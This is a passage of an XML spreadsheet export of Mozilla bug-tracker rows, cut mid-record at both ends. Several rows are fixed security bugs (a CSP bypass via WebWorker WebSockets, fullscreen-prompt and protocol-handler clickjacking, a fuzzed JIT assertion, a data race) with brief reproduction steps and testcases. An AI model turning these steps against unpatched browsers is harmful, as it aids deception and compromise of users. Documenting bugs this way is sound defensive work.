###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file /Users/jruderman/trunk/mozilla/layout/generic/nsInlineFrame.cpp, line 470
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file /Users/jruderman/trunk/mozilla/layout/generic/nsContainerFrame.cpp, line 1092
Crash in nsIFrame::GetNextSibling, called by nsFrameList::SortByContentOrder, dereferencing 0xddddddfd.</t>
        </is>
      </c>
      <c r="X942" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="943">
      <c r="A943" t="n">
        <v>1800890</v>
      </c>
      <c r="B943" t="inlineStr">
        <is>
          <t>2022-11-16 05:37:47 -0800</t>
        </is>
      </c>
      <c r="C943" t="inlineStr">
        <is>
          <t>connect-src CSP header does not apply to WebWorker initiated WebSocket connections</t>
        </is>
      </c>
      <c r="D943" t="inlineStr">
        <is>
          <t>2024-05-30 11:02:30 -0700</t>
        </is>
      </c>
      <c r="E943" t="n">
        <v>1</v>
      </c>
      <c r="F943" t="n">
        <v>1</v>
      </c>
      <c r="G943" t="n">
        <v>3</v>
      </c>
      <c r="H943" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I943" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J943" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K943" t="inlineStr">
        <is>
          <t>Firefox 107</t>
        </is>
      </c>
      <c r="L943" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M943" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N943" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O943" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P943" t="inlineStr">
        <is>
          <t>[domsecurity-active] [post-critsmash-triage][adv-main109+][adv-esr102.7+]</t>
        </is>
      </c>
      <c r="Q943" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R943" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S943" t="inlineStr">
        <is>
          <t>109 Branch</t>
        </is>
      </c>
      <c r="T943" t="n">
        <v>1</v>
      </c>
      <c r="U943" t="n">
        <v>0</v>
      </c>
      <c r="V943" t="n">
        <v>30</v>
      </c>
      <c r="W943" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Steps to reproduce:
1. Navigate to https://testpages.kzar.co.uk/csp/?csp=connect-src+%27none%27
Actual results:
"WebSocket (third-party via WebWorker via inline script)" is listed as Loaded.
Expected results:
"WebSocket (third-party via WebWorker via inline script)" is listed as Failed. (Which happens with Chrome 107.0.5304.87)</t>
        </is>
      </c>
      <c r="X943" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="944">
      <c r="A944" t="n">
        <v>1822305</v>
      </c>
      <c r="B944" t="inlineStr">
        <is>
          <t>2023-03-14 06:35:50 -0700</t>
        </is>
      </c>
      <c r="C944" t="inlineStr">
        <is>
          <t>Block the fullscreen notification on Android using external protocol prompt</t>
        </is>
      </c>
      <c r="D944" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:55 -0700</t>
        </is>
      </c>
      <c r="E944" t="n">
        <v>1</v>
      </c>
      <c r="F944" t="n">
        <v>1</v>
      </c>
      <c r="G944" t="n">
        <v>2</v>
      </c>
      <c r="H944" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I944" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J944" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K944" t="inlineStr">
        <is>
          <t>Firefox 111</t>
        </is>
      </c>
      <c r="L944" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M944" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N944" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O944" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P944" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q944" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R944" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S944" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T944" t="n">
        <v>1</v>
      </c>
      <c r="U944" t="n">
        <v>0</v>
      </c>
      <c r="V944" t="n">
        <v>8</v>
      </c>
      <c r="W944" t="inlineStr">
        <is>
          <t>Created attachment 9322976
fullscreen-bypass.html
The new external protocol prompt on Android seems to be asynchronous. Therefore it is possible to trigger a keyboard and the external protocol prompt and fullscreen at the same time which causes the fullscreen popup to be covered.
1. Go to fullscreen-bypass.html
2. Click the input bar</t>
        </is>
      </c>
      <c r="X944" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="945">
      <c r="A945" t="n">
        <v>1132265</v>
      </c>
      <c r="B945" t="inlineStr">
        <is>
          <t>2015-02-11 15:41:47 -0800</t>
        </is>
      </c>
      <c r="C945" t="inlineStr">
        <is>
          <t>Assertion failure: entry.isIon() || entry.isBaseline() || entry.isIonCache(), at jit/JitFrames.cpp</t>
        </is>
      </c>
      <c r="D945" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:38 -0700</t>
        </is>
      </c>
      <c r="E945" t="n">
        <v>1</v>
      </c>
      <c r="F945" t="n">
        <v>1</v>
      </c>
      <c r="G945" t="n">
        <v>3</v>
      </c>
      <c r="H945" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I945" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J945" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K945" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L945" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M945" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N945" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O945" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P945" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main39+]</t>
        </is>
      </c>
      <c r="Q945" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R945" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S945" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T945" t="n">
        <v>1</v>
      </c>
      <c r="U945" t="n">
        <v>0</v>
      </c>
      <c r="V945" t="n">
        <v>11</v>
      </c>
      <c r="W945" t="inlineStr">
        <is>
          <t>// Randomly chosen test: js/src/jit-test/tests/basic/bug908915.js
(function() {
    function callFromJIT(f) {
        f();
    }
    const fs = [
        function() {
            /* warm up the caller */
        },
        function() {
            enableSPSProfiling();
            enableSingleStepProfiling();
        },
    ];
    for each (let f in fs) {
        callFromJIT(f);
    }
})();
asserts js debug shell on m-c changeset ee093ca70666 with --fuzzing-safe --no-threads --ion-eager at Assertion failure: entry.isIon() || entry.isBaseline() || entry.isIonCache(), at jit/JitFrames.cpp.
Debug configure options:
LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -msse2 -mfpmath=sse -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments -msse2 -mfpmath=sse" AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 HOST_CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-arm-simulator --enable-debug --enable-profiling --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/fuzzing/js/compileShell.py -b "--32 --enable-debug --enable-profiling --enable-nspr-build --enable-more-deterministic --enable-arm-simulator -R ~/trees/mozilla-central" -r ee093ca70666
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/70a8168c7d24
user:        Kannan Vijayan
date:        Thu Jan 15 20:11:21 2015 -0500
summary:     Bug 1057082 - 3/7 - Modify jits to use lastProfilingFrame and lastProfilingCallSite fields. r=jandem
Setting s-s by default because this involves the profiler, see bug 1124036 comment 4. Big thanks to Jesse for helping reduce this testcase.
Kannan, is bug 1057082 a likely regressor?</t>
        </is>
      </c>
      <c r="X945" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="946">
      <c r="A946" t="n">
        <v>586478</v>
      </c>
      <c r="B946" t="inlineStr">
        <is>
          <t>2010-08-11 15:30:02 -0700</t>
        </is>
      </c>
      <c r="C946" t="inlineStr">
        <is>
          <t>New Start Page</t>
        </is>
      </c>
      <c r="D946" t="inlineStr">
        <is>
          <t>2010-10-27 08:34:37 -0700</t>
        </is>
      </c>
      <c r="E946" t="n">
        <v>1</v>
      </c>
      <c r="F946" t="n">
        <v>1</v>
      </c>
      <c r="G946" t="n">
        <v>5</v>
      </c>
      <c r="H946" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I946" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J946" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K946" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N946" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O946" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P946" t="inlineStr"/>
      <c r="Q946" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R946" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S946" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T946" t="n">
        <v>1</v>
      </c>
      <c r="U946" t="n">
        <v>0</v>
      </c>
      <c r="V946" t="n">
        <v>7</v>
      </c>
      <c r="W946" t="inlineStr">
        <is>
          <t>The new start page will not be a wiki document - we need to build it.</t>
        </is>
      </c>
      <c r="X946" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="947">
      <c r="A947" t="n">
        <v>1169939</v>
      </c>
      <c r="B947" t="inlineStr">
        <is>
          <t>2015-05-30 09:44:11 -0700</t>
        </is>
      </c>
      <c r="C947" t="inlineStr">
        <is>
          <t>Use less noisy pylint/landscape.io configs</t>
        </is>
      </c>
      <c r="D947" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E947" t="n">
        <v>1</v>
      </c>
      <c r="F947" t="n">
        <v>1</v>
      </c>
      <c r="G947" t="n">
        <v>7</v>
      </c>
      <c r="H947" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I947" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J947" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K947" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L947" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M947" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N947" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O947" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P947" t="inlineStr"/>
      <c r="Q947" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R947" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S947" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T947" t="n">
        <v>1</v>
      </c>
      <c r="U947" t="n">
        <v>0</v>
      </c>
      <c r="V947" t="n">
        <v>3</v>
      </c>
      <c r="W947" t="inlineStr">
        <is>
          <t>To help with bug 1169938, we should:
(a) check a pylintrc into the repo with sensible defaults (since otherwise we just use landscape.io's defaults - and also have no way to repro locally)
(b) tweak .landscape.yaml to reduce the number of false positives (eg turn off warnings for tests, at least initially)</t>
        </is>
      </c>
      <c r="X947" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="948">
      <c r="A948" t="n">
        <v>1866100</v>
      </c>
      <c r="B948" t="inlineStr">
        <is>
          <t>2023-11-22 08:17:13 -0800</t>
        </is>
      </c>
      <c r="C948" t="inlineStr">
        <is>
          <t>Firefox external protocol handler prompt is vulnerable to clickjacking</t>
        </is>
      </c>
      <c r="D948" t="inlineStr">
        <is>
          <t>2024-09-16 00:27:06 -0700</t>
        </is>
      </c>
      <c r="E948" t="n">
        <v>1</v>
      </c>
      <c r="F948" t="n">
        <v>1</v>
      </c>
      <c r="G948" t="n">
        <v>2</v>
      </c>
      <c r="H948" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I948" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J948" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K948" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L948" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M948" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N948" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O948" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P948" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main124+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q948" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R948" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S948" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T948" t="n">
        <v>1</v>
      </c>
      <c r="U948" t="n">
        <v>0</v>
      </c>
      <c r="V948" t="n">
        <v>27</v>
      </c>
      <c r="W948" t="inlineStr">
        <is>
          <t>Created attachment 9365009
demo.mp4
Opening a popup and initiating protocol URI on a hidden window; an attacker can lure the vicitim to clickjack the protocol handler prompt to allow the protocol unknowingly.
Steps to reproduce:
1. Download index.html and popup.html to a folder.
2. Open the index.html and start testing.</t>
        </is>
      </c>
      <c r="X948" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="949">
      <c r="A949" t="n">
        <v>727489</v>
      </c>
      <c r="B949" t="inlineStr">
        <is>
          <t>2012-02-15 09:38:38 -0800</t>
        </is>
      </c>
      <c r="C949" t="inlineStr">
        <is>
          <t>Use branch set to sourceRepoInfo['path'] for release AggregatingSchedulers</t>
        </is>
      </c>
      <c r="D949" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E949" t="n">
        <v>1</v>
      </c>
      <c r="F949" t="n">
        <v>1</v>
      </c>
      <c r="G949" t="n">
        <v>5</v>
      </c>
      <c r="H949" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I949" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J949" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K949" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L949" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M949" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N949" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O949" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P949" t="inlineStr">
        <is>
          <t>[releases][automation]</t>
        </is>
      </c>
      <c r="Q949" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R949" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S949" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T949" t="n">
        <v>1</v>
      </c>
      <c r="U949" t="n">
        <v>0</v>
      </c>
      <c r="V949" t="n">
        <v>4</v>
      </c>
      <c r="W949" t="inlineStr">
        <is>
          <t>Created attachment 597446
use sourceRepoInfo['path']
I think that all AggregatingSchedulers used in release.py should use branch set to sourceRepoInfo['path'], so the downstream builders clobber using a proper branch.
To be tested in staging.</t>
        </is>
      </c>
      <c r="X949" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="950">
      <c r="A950" t="n">
        <v>1320134</v>
      </c>
      <c r="B950" t="inlineStr">
        <is>
          <t>2016-11-24 08:22:46 -0800</t>
        </is>
      </c>
      <c r="C950" t="inlineStr">
        <is>
          <t>Crash in xul.dll@0x4d768 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0x4d739 | xul.dll@0...</t>
        </is>
      </c>
      <c r="D950" t="inlineStr">
        <is>
          <t>2017-08-21 20:52:05 -0700</t>
        </is>
      </c>
      <c r="E950" t="n">
        <v>1</v>
      </c>
      <c r="F950" t="n">
        <v>1</v>
      </c>
      <c r="G950" t="n">
        <v>3</v>
      </c>
      <c r="H950" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I950" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J950" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K950" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L950" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M950" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N950" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O950" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P950" t="inlineStr">
        <is>
          <t>[ps-radar]</t>
        </is>
      </c>
      <c r="Q950" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R950" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S950" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T950" t="n">
        <v>1</v>
      </c>
      <c r="U950" t="n">
        <v>0</v>
      </c>
      <c r="V950" t="n">
        <v>86</v>
      </c>
      <c r="W950" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-ba31674f-32a7-427e-916d-99e2d2161124.
=============================================================
Crashing Thread (33)
Frame 	Module 	Signature 	Source
0 	xul.dll 	xul.dll@0x4d768 	
1 	xul.dll 	xul.dll@0x4d739 	
2 	xul.dll 	xul.dll@0x4d739 	
3 	xul.dll 	xul.dll@0x4d739 	
4 	xul.dll 	xul.dll@0x4d739 	
5 	xul.dll 	xul.dll@0x4d739 	
6 	xul.dll 	xul.dll@0x4d739 	
7 	xul.dll 	xul.dll@0x4d739 	
8 	xul.dll 	xul.dll@0x4d739 	
9 	xul.dll 	xul.dll@0x4d739 	
10 	xul.dll 	xul.dll@0x4d739 	
11 	xul.dll 	xul.dll@0x4d739 	
12 	xul.dll 	xul.dll@0x4d739 	
13 	xul.dll 	xul.dll@0x4d739 	
14 	xul.dll 	xul.dll@0x4d739 	
15 	xul.dll 	xul.dll@0x4d739 	
16 	xul.dll 	xul.dll@0x4d739 	
17 	xul.dll 	xul.dll@0x4d739 	
18 	xul.dll 	xul.dll@0x4d739 	
19 	xul.dll 	xul.dll@0x4d739 	
20 	xul.dll 	xul.dll@0x4d739 	
21 	xul.dll 	xul.dll@0x4d739 	
22 	xul.dll 	xul.dll@0x4d739 	
23 	xul.dll 	xul.dll@0x4d739 	
24 	xul.dll 	xul.dll@0x4d739 	
25 	xul.dll 	xul.dll@0x4d739 	
26 	xul.dll 	xul.dll@0x4d739 	
27 	xul.dll 	xul.dll@0x4d739 	
28 	xul.dll 	xul.dll@0x4d739 	
29 	xul.dll 	xul.dll@0x4d739 	
30 	xul.dll 	xul.dll@0x4d739 	
31 	xul.dll 	xul.dll@0x4d739 	
32 	xul.dll 	xul.dll@0x4d739 	
33 	xul.dll 	xul.dll@0x4d739 	
34 	xul.dll 	xul.dll@0x4d739 	
35 	xul.dll 	xul.dll@0x4d739 	
36 	xul.dll 	xul.dll@0x4d739 	
37 	xul.dll 	xul.dll@0x4d739 	
38 	xul.dll 	xul.dll@0x4d739 	
39 	xul.dll 	xul.dll@0x4d739 	
40 	xul.dll 	xul.dll@0x4d739 	
41 	xul.dll 	xul.dll@0x4d739 	
42 	xul.dll 	xul.dll@0x4d739 	
43 	xul.dll 	xul.dll@0x4d739 	
44 	xul.dll 	xul.dll@0x4d739 	
45 	xul.dll 	xul.dll@0x4d739 	
46 	xul.dll 	xul.dll@0x4d739 	
47 	xul.dll 	xul.dll@0x4d739 	
48 	xul.dll 	xul.dll@0x4d739 	
49 	xul.dll 	xul.dll@0x4d739 	
50 	xul.dll 	xul.dll@0x4d739 	
51 	xul.dll 	xul.dll@0x4d739 	
52 	xul.dll 	xul.dll@0x4d739 	
53 	xul.dll 	xul.dll@0x4d739 	
54 	xul.dll 	xul.dll@0x4d739 	
55 	xul.dll 	xul.dll@0x4d739 	
56 	xul.dll 	xul.dll@0x4d739 	
57 	xul.dll 	xul.dll@0x4d739 	
58 	xul.dll 	xul.dll@0x4d739 	
59 	xul.dll 	xul.dll@0x4d739 	
60 	xul.dll 	xul.dll@0x4d739 	
61 	xul.dll 	xul.dll@0x4d739 	
62 	xul.dll 	xul.dll@0x4d739 	
63 	xul.dll 	xul.dll@0x4d739 	
64 	xul.dll 	xul.dll@0x4d739 	
65 	xul.dll 	xul.dll@0x4d739 	
66 	xul.dll 	xul.dll@0x4d739 	
67 	xul.dll 	xul.dll@0x4d739 	
68 	xul.dll 	xul.dll@0x4d739 	
69 	xul.dll 	xul.dll@0x4d739 	
70 	xul.dll 	xul.dll@0x4d739 	
71 	xul.dll 	xul.dll@0x4d739 	
72 	xul.dll 	xul.dll@0x4d739 	
73 	xul.dll 	xul.dll@0x4d739 	
74 	xul.dll 	xul.dll@0x4d739 	
75 	xul.dll 	xul.dll@0x4d739 	
76 	xul.dll 	xul.dll@0x4d739 	
77 	xul.dll 	xul.dll@0x4d739 	
78 	xul.dll 	xul.dll@0x4d739 	
79 	xul.dll 	xul.dll@0x4d739 	
80 	xul.dll 	xul.dll@0x4d739 	
81 	xul.dll 	xul.dll@0x4d739 	
82 	xul.dll 	xul.dll@0x4d739 	
83 	xul.dll 	xul.dll@0x4d739 	
84 	xul.dll 	xul.dll@0x4d739 	
85 	xul.dll 	xul.dll@0x4d739 	
86 	xul.dll 	xul.dll@0x4d739 	
87 	xul.dll 	xul.dll@0x4d739 	
88 	xul.dll 	xul.dll@0x4d739 	
89 	xul.dll 	xul.dll@0x4d739 	
187 	xul.dll 	xul.dll@0x4d739 	
188 	xul.dll 	xul.dll@0x4d739 	
189 	xul.dll 	xul.dll@0x4d739 	
190 	xul.dll 	mp4_demuxer::MP4MetadataRust::MP4MetadataRust(mp4_demuxer::Stream*) 	media/libstagefright/binding/MP4Metadata.cpp:589
191 	xul.dll 	mp4_demuxer::MP4Metadata::MP4Metadata(mp4_demuxer::Stream*) 	media/libstagefright/binding/MP4Metadata.cpp:157
192 	xul.dll 	mozilla::MP4Demuxer::Init() 	dom/media/fmp4/MP4Demuxer.cpp:140
193 	xul.dll 	mozilla::TrackBuffersManager::InitializationSegmentReceived() 	dom/media/mediasource/TrackBuffersManager.cpp:901
194 	nss3.dll 	nss3.dll@0x490f 	
195 	nss3.dll 	PR_GetThreadPrivate 	nsprpub/pr/src/threads/prtpd.c:204
196 	xul.dll 	nsThreadManager::GetCurrentThread() 	xpcom/threads/nsThreadManager.cpp:222
this signature is the #5 crash in the content process in 51.0b so far (around 2.35% of all content crashes) and occurring on win7 &amp; 8.1.</t>
        </is>
      </c>
      <c r="X950" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="951">
      <c r="A951" t="n">
        <v>1789503</v>
      </c>
      <c r="B951" t="inlineStr">
        <is>
          <t>2022-09-06 13:55:50 -0700</t>
        </is>
      </c>
      <c r="C951" t="inlineStr">
        <is>
          <t>ThreadSanitizer: data race in XPCOMService_GetThirdPartyUtil</t>
        </is>
      </c>
      <c r="D951" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:16 -0700</t>
        </is>
      </c>
      <c r="E951" t="n">
        <v>1</v>
      </c>
      <c r="F951" t="n">
        <v>1</v>
      </c>
      <c r="G951" t="n">
        <v>3</v>
      </c>
      <c r="H951" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I951" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J951" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K951" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L951" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M951" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N951" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O951" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P951" t="inlineStr">
        <is>
          <t>[fixed by bug 1789902][necko-triaged][post-critsmash-triage][adv-main106+]</t>
        </is>
      </c>
      <c r="Q951" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R951" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S951" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T951" t="n">
        <v>1</v>
      </c>
      <c r="U951" t="n">
        <v>0</v>
      </c>
      <c r="V951" t="n">
        <v>12</v>
      </c>
      <c r="W951" t="inlineStr">
        <is>
          <t>This data race occurred when two `Worker()` threads were concurrently initializing their CacheStorage.
Since the CacheStorage is created lazily, that would happen when accessing the `caches` global the first time, e.g.:
```js
new Worker(URL.createObjectURL(new Blob(["self.caches"])))
```
TSAN report from `m-c-20220901215206-tsan-opt`:
```cpp
WARNING: ThreadSanitizer: data race (pid=2832989)
  Read of size 8 at 0x7f2d10df5c28 by thread T26:
    #0 XPCOMService_GetThirdPartyUtil /builds/worker/workspace/obj-build/xpcom/build/Services.cpp:465:8 (libxul.so+0x1219e25) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #1 xpcom::services::get_ThirdPartyUtil::hc14c5b99fc9b0511 /builds/worker/workspace/obj-build/xpcom/build/services.rs:173:43 (libxul.so+0x9d14f58) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #2 mozurl::get_base_domain::h344f0f5988d19466 /builds/worker/checkouts/gecko/netwerk/base/mozurl/src/lib.rs:319:36 (libxul.so+0x9d14f58)
    #3 mozurl_base_domain /builds/worker/checkouts/gecko/netwerk/base/mozurl/src/lib.rs:358:15 (libxul.so+0x9d14f58)
    #4 BaseDomain /builds/worker/workspace/obj-build/dist/include/mozilla/net/MozURL.h:76:12 (libxul.so+0x5000d56) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #5 mozilla::dom::quota::QuotaManager::IsPrincipalInfoValid(mozilla::ipc::PrincipalInfo const&amp;) /builds/worker/checkouts/gecko/dom/quota/ActorsParent.cpp:6834:21 (libxul.so+0x5000d56)
    #6 BaseDomain /builds/worker/workspace/obj-build/dist/include/mozilla/net/MozURL.h:76:12 (libxul.so+0x5000d56) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #7 mozilla::dom::quota::QuotaManager::IsPrincipalInfoValid(mozilla::ipc::PrincipalInfo const&amp;) /builds/worker/checkouts/gecko/dom/quota/ActorsParent.cpp:6834:21 (libxul.so+0x5000d56)
    #8 mozilla::dom::cache::CacheStorage::CreateOnWorker(mozilla::dom::cache::Namespace, nsIGlobalObject*, mozilla::dom::WorkerPrivate*, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/cache/CacheStorage.cpp:195:3 (libxul.so+0x3d96b4b) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #9 mozilla::dom::WorkerGlobalScope::GetCaches(mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/WorkerScope.cpp:439:21 (libxul.so+0x5675d9c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
